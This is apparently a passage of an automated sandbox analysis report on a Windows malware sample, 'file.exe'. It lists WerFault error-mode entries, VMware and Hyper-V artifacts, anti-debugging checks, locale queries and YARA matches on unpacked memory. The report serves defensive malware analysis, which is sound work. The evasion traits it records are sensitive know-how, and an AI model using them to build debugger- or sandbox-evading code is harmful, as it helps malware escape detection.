Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware Virtual USB Mouse |
Source: Amcache.hve.9.dr |
Binary or memory string: vmci.syshbin |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware, Inc. |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware20,1hbin@ |
Source: Amcache.hve.9.dr |
Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563 |
Source: Amcache.hve.9.dr |
Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.9.dr |
Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys |
Source: file.exe, 00000000.00000002.2073863942.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: Amcache.hve.9.dr |
Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.9.dr |
Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev |
Source: Amcache.hve.9.dr |
Binary or memory string: c:/windows/system32/drivers/vmci.sys |
Source: Amcache.hve.9.dr |
Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.9.dr |
Binary or memory string: vmci.sys |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0 |
Source: Amcache.hve.9.dr |
Binary or memory string: vmci.syshbin` |
Source: Amcache.hve.9.dr |
Binary or memory string: \driver\vmci,\driver\pci |
Source: file.exe, 00000000.00000002.2073485392.000000000086B000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW 7 |
Source: Amcache.hve.9.dr |
Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware20,1 |
Source: Amcache.hve.9.dr |
Binary or memory string: Microsoft Hyper-V Generation Counter |
Source: Amcache.hve.9.dr |
Binary or memory string: NECVMWar VMware SATA CD00 |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware Virtual disk SCSI Disk Device |
Source: Amcache.hve.9.dr |
Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom |
Source: Amcache.hve.9.dr |
Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk |
Source: Amcache.hve.9.dr |
Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware PCI VMCI Bus Device |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware VMCI Bus Device |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware Virtual RAM |
Source: Amcache.hve.9.dr |
Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1 |
Source: Amcache.hve.9.dr |
Binary or memory string: vmci.inf_amd64_68ed49469341f563 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004018E0 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LdrInitializeThunk,MultiByteToWideChar,MultiByteToWideChar, |
0_2_004018E0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00411002 mov eax, dword ptr fs:[00000030h] |
0_2_00411002 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040C4F1 mov eax, dword ptr fs:[00000030h] |
0_2_0040C4F1 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005F092B mov eax, dword ptr fs:[00000030h] |
0_2_005F092B |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00601269 mov eax, dword ptr fs:[00000030h] |
0_2_00601269 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005F0D90 mov eax, dword ptr fs:[00000030h] |
0_2_005F0D90 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005FC758 mov eax, dword ptr fs:[00000030h] |
0_2_005FC758 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_007C4A8B push dword ptr fs:[00000030h] |
0_2_007C4A8B |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00407B06 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_00407B06 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004084E5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_004084E5 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00408679 SetUnhandledExceptionFilter, |
0_2_00408679 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040BFEB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_0040BFEB |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005F88E0 SetUnhandledExceptionFilter, |
0_2_005F88E0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005FC252 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_005FC252 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005F7D6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_005F7D6D |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_005F874C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_005F874C |
Source: C:\Users\user\Desktop\file.exe |
Code function: EnumSystemLocalesW, |
0_2_00418885 |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
0_2_00418910 |
Source: C:\Users\user\Desktop\file.exe |
Code function: EnumSystemLocalesW, |
0_2_00411112 |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW, |
0_2_00418B63 |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
0_2_00418C89 |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW, |
0_2_00418D8F |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
0_2_00418E5E |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW, |
0_2_00411634 |
Source: C:\Users\user\Desktop\file.exe |
Code function: EnumSystemLocalesW, |
0_2_004187EA |
Source: C:\Users\user\Desktop\file.exe |
Code function: EnumSystemLocalesW, |
0_2_0041879F |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
0_2_006090C5 |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW, |
0_2_0060189B |
Source: C:\Users\user\Desktop\file.exe |
Code function: EnumSystemLocalesW, |
0_2_00608A51 |
Source: C:\Users\user\Desktop\file.exe |
Code function: EnumSystemLocalesW, |
0_2_00608A06 |
Source: C:\Users\user\Desktop\file.exe |
Code function: EnumSystemLocalesW, |
0_2_00608AEC |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
0_2_00608B77 |
Source: C:\Users\user\Desktop\file.exe |
Code function: EnumSystemLocalesW, |
0_2_00601379 |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW, |
0_2_00608DCA |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
0_2_00608EF0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoW, |
0_2_00608FF6 |
Source: Yara match |
File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.file.exe.5f0e67.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.3.file.exe.740000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000003.1680069236.0000000000740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.file.exe.5f0e67.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.3.file.exe.740000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000003.1680069236.0000000000740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY |